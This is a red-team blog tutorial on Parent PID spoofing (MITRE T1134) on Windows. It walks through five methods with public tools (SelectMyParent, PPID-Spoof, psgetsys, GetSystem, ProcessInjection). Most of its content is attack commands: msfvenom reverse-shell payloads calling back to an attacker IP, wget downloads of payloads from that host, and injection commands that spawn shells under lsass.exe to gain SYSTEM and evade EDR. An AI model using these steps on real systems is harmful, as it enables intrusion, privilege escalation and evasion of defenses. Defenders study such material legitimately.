Red Teaming

Parent PID Spoofing (Mitre:T1134)

by Raj

Parent PID spoofing is an access token manipulation technique that helps an attacker evade defense mechanisms such as heuristic detection by spoofing the PPID of a malicious file to that of a legitimate process like explorer.exe. Additionally, attackers use native API calls to explicitly assign the PID, typically through the CreateProcess call in C++. This explicit assignment often provides side benefits, as we will explore in this article.

  • MITRE TACTIC: Privilege Escalation (TA0004) and Defence Evasion (TA0005)
  • MITRE TECHNIQUE ID: T1134 (Access Token Manipulation)
  • SUBTITLE: Parent PID Spoofing (T1547.009)

Table of content

  • Background
  • Process, PID and Parent PID
  • Method 1 (C++ binary for PID Spoofing)
  • Method 2 (DLL injection by PID Spoofing in powershell)
  • Method 3 (Powershell script for PID spoofing)
  • Method 4 (C# binary for PID Spoofing)
  • Method 5 (Shellcode injection by PID Spoofing)
  • Conclusion

Background

Child process monitoring remains one of the most common techniques in threat hunting. Specifically, a threat hunter might analyze if a process like conhost.exe or cmd.exe has been spawned from a non-related tool like Adobe Reader or MS Excel, which may indicate potential compromise. Moreover, AV solutions monitor this behavior under heuristic detection and alert the admin accordingly.

Parent PID spoofing effectively counters that detection. Notably, the PPID method tricks an AV/EDR solution into believing that a legitimate process like lsass.exe initiated the suspicious activity. Furthermore, by spoofing the process PID to match its parent, an attacker may achieve privilege escalation—especially if the parent is running with SYSTEM privileges, granting inherited SYSTEM rights to the child.

Process, PID and Parent PID

Process: In Windows, an application comprises one or more processes. Simply put, a process is part of a currently running program. Often, different apps use the same process (e.g., cmd.exe), and for differentiation, Windows assigns a unique PID (Process Identifier). This helps distinguish one process from another in system memory.

PID: The PID (Process Identifier) is a numeric tag that uniquely identifies a running process. For instance, developers often use the GetCurrentProcessID() function in Windows to retrieve the PID of a specific process during program execution.

Parent Process: Parent processes are the processes that can spawn multiple child processes. For example, the command explorer.exe /root,”C:\Windows\System32\cmd.exe” shall spawn cmd.exe as a child process to parent explorer.exe. In code, parents may use fork() system call to spawn the child.

PPI: Stands for Parent Process Identifier (PPID) which is a numeric representation given to a parent process. Any process that has child process qualifies to be in a parent-child relationship.

Method 1 (C++ binary for PID Spoofing)

Initially, Didier Stevens introduced this method in a public post. . Although the original code became inaccessible in many regions, it remains available through Wayback Machine. Importantly, I rebuilt the SelectMyParent.exe using Visual Studio 2022 after removing the .pdb files from both the debugging and release folders to make it functional.

At the admin end, you see explorer.exe running on PID 3808.

Thus, to spawn our very own binary under this parent explorer.exe, we can use SelectMyParent.exe like this and you’d see a new process created on the PID mentioned in the output.

SelectMyParent.exe notepad 3808

Upon inspecting in process explorer we can see notepad launched on port 1168

Likewise, we can run our own EXE too. Let’s create one exe using msfvenom first and upload the file using python3 web server

msfvenom -p windows/x64/shell_reverse_tcp -f exe LHOST=192.168.0.89 LPORT=1337 > shell.exe
python3 -m http.server 80

While using a compromised terminal, one can view the processes running using tasklist command

In the list, you can see lsass.exe process running on port 644 as NT AUTHORITY\SYSTEM

So, I’ll run the SelectMyParent.exe by specifying the shell I uploaded and PID of lsass.exe

SelectMyParent.exe shell.exe 644

As you can see, on port 1337, I receive a callback as NT AUTHORITY\SYSTEM indicating that privileges have been escalated!

Method 2 (DLL injection by PID Spoofing in powershell)

F-Secure labs created an alternate to Didier’s binary in powershell. They are using the same process as followed by Didier but the main difference is that a child process with injected DLL can be spawned as a child making it powerful. This injection is done by spoofing PID. The code can be downloaded here. Further, on a compromised system, an attacker must observe desired PID using a tasklist. Here, we are choosing Powershell as a parent with PID 3488

Now, we will use msfvenom to create our own DLL which will be injected in the process

msfvenom -p windows/x64/shell_reverse_tcp exitfunc=thread LHOST=192.168.0.89 LPORT=1234 -f dll > shell.dll

Now, we need to upload the powershell script and run the following command:

Import-Module .\PPID-Spoof.ps1
PPID-Spoof -ppid 3488 -spawnto "C:\Windows\System32\notepad.exe" -dllpath shell.dll

As you can see, it worked and a reverse shell received

This way, a notepad.exe with injected code (given by DLL) has been spawned as a child to powershell.exe process on PPID 3488

Method 3 (Powershell script for PID Spoofing)

Decoder-it developed a powershell script based on the guidelines provided by Didier Stevens. By using the CreateProcessFromParent() method, psgetsystem script which can be found here, can be used to spawn child process by PID Spoofing. First, we note the PID of our desired process. Here, lsass.exe

Now, we can run the script in powershell like:

powershell -ep bypass
wget 192.168.0.89/psgetsys.ps1 -O psgetsys.ps1
Import-Module .\psgetsys.ps1
[MyProcess]::CreateProcessFromParent(636,"C:\Users\Public\shell.exe","")

At the admin end, we can see that a shell.exe has been spawned from lsass.exe process

And as a result, a reverse shell has been received.

Method 4 (C# binary for PID Spoofing)

py7hagoras developed the GetSystem project which is a C# implementation of the same technique we discussed which could be found here.

We simply need to upload this on the victim system and provide path of the malicious file as argument 1 and name of the process which is to be spoofed as argument 2

powershell wget 192.168.0.89/GetSystem.exe -O GetSystem.exe
GetSystem.exe shell.exe -O lsass

Now, the tool will automatically find the PID of the process provided as the argument and automatically run the shell

At the admin end, we can see that shell.exe has been spawned as a child process of the lsass process.

Method 5 (Shellcode injection by PID Spoofing)

Chirag Savla developed a great tool called “ProcessInjection” in C# that can perform a number of functions including Process Injections by PID spoofing. By providing a valid PID, the tool tries to use native API calls like CreateProcess to spoof PID and then inject code in them. The tool supports hex, C and base64 shellcode input and also, DLL injections are an option too by utilizing the same method. Download from here.

First, we need to create a hexadecimal shellcode of a reverse_tcp payload using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp exitfunc=thread LHOST=192.168.0.89 LPORT=1234 -f hex > hex.txt

Now that we have made our shellcode, in the victim system we can run the tool. Note that the tool takes in many flags as input based on the action to be performed which can be viewed just by typing “ProcessInjection.exe”

To run shellcode injection in a process, we use the following flags:

  • /ppath: process path of an EXE that is being targeted
  • /path: path of the shellcode to be inserted in the targeted exe
  • /parentproc: EXE targeted shall be spawned under this process
  • /f: filetype
  • /t: attack type. Here, /t:1 is a Vanilla Process Injection
powershell wget 192.168.0.89/hex.txt -O hex.txt
powershell wget 192.168.0.89/ProcessInjection.exe -O ProcessInjection.exe
ProcessInjection.exe /ppath:"C:\Windows\System32\calc.exe" /path:"hex.txt" /parentproc:explorer /f:hex /t:1

As desired, calc.exe has been loaded with our provided shellcode under the explorer.exe process

And, as expected a reverse shell has been received!

Now, the same tool can also be used to inject DLLs in the desired exe using calls like VirtualAllocEx and WriteProcessMemory.

Firstly, we first need to create our DLL using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp exitfunc=thread LHOST=192.168.0.89 LPORT=1234 -f dll > shell.dll

Now, we can use ProcessInjection.exe with /t:2 for DLL injections to target calc.exe and injecting shell.dll in it like:

ProcessInjection.exe /ppath:"C:\Windows\System32\calc.exe" /path:shell.dll /parentproc:explorer /t:2

As expected a reverse shell has been received upon successful execution of the DLL

Upon inspecting processes in the admin system using process explorer we see that explorer.exe has a child calc.exe which in turn in running our DLL using rundll library

Conclusion

Attackers now widely exploit this technique to conduct stealthy operations, significantly delaying threat hunters from detecting Indicators of Compromise (IoCs). Unfortunately, many outdated or unpatched EDR solutions fail to detect such techniques. Therefore, this article highlights the importance of keeping security tools up to date and using advanced detection capabilities to thwart PID spoofing attacks.

Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contact here

Related posts:

Default ThumbnailWindows Privilege Escalation: sAMAccountName Spoofing Default ThumbnailProcess Hollowing (Mitre:T1055.012)